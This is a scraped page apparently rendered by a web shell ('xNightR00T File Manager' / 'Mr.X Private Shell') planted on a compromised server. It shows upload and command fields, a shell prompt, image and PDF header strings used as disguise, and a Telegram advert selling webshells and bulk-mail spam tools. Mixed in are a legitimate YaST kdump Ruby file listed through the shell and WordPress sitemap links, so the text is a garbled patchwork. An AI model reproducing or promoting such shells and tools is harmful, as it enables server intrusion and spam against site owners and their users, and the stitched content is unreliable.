xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ------------------------------------------------------------------------------
# Copyright (c) 2006 Novell, Inc. All Rights Reserved.
#
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of version 2 of the GNU General Public License as published by the
# Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail, you may find
# current contact information at www.novell.com.
# ------------------------------------------------------------------------------

# File:	include/kdump/complex.ycp
# Package:	Configuration of kdump
# Summary:	Dialogs definitions
# Authors:	Jozef Uhliarik <juhliarik@suse.com>
#
# $Id: complex.ycp 29363 2006-03-24 08:20:43Z mzugec $
module Yast
  module KdumpComplexInclude
    def initialize_kdump_complex(include_target)
      Yast.import "UI"

      textdomain "kdump"

      Yast.import "Label"
      Yast.import "Popup"
      Yast.import "Wizard"
      Yast.import "Confirm"
      Yast.import "Kdump"
      Yast.import "Package"
      Yast.import "Arch"
      Yast.import "Report"
      Yast.import "Mode"
      Yast.import "Message"
      Yast.import "PackageSystem"

      Yast.include include_target, "kdump/helps.rb"
    end

    # Return a modification status
    # @return true if data was modified
    def Modified
      Kdump.GetModified
    end

    def ReallyAbort
      !Kdump.GetModified || Popup.ReallyAbort(true)
    end

    def PollAbort
      UI.PollInput == :abort
    end

    # @return true if necessary packages are installed
    def InstallPackages
      #install packages
      package_list = KdumpClass::KDUMP_PACKAGES
      if !PackageSystem.CheckAndInstallPackages(package_list)
        Report.Error(Message.CannotContinueWithoutPackagesInstalled)
        Builtins.y2error(
            "[kdump] Installation of package list %1 failed or aborted",
            package_list
          )
        return false
      end

      true
    end

    # Read settings dialog
    # @return `abort if aborted and `next otherwise
    def ReadDialog
      Wizard.RestoreHelp(Ops.get_string(@HELPS, "read", ""))
      # Kdump::AbortFunction = PollAbort;
      return :abort if !Confirm.MustBeRoot
      if !Kdump.system.supports_kdump? && !unsupported_kdump_confirmation
        return :abort
      end
      InstallPackages() or return :abort

      ret = Kdump.Read
      ret ? :next : :abort
    end

    # Write settings dialog
    # @return `abort if aborted and `next otherwise
    def WriteDialog
      Wizard.RestoreHelp(Ops.get_string(@HELPS, "write", ""))
      # Kdump::AbortFunction = PollAbort;
      ret = Kdump.Write
      ret ? :next : :abort
    end
  end
end

Filemanager

Name Type Size Permission Actions
complex.rb File 3.02 KB 0644
dialogs.rb File 19.45 KB 0644
helps.rb File 12.21 KB 0644
uifunctions.rb File 53.31 KB 0644
wizards.rb File 3.07 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml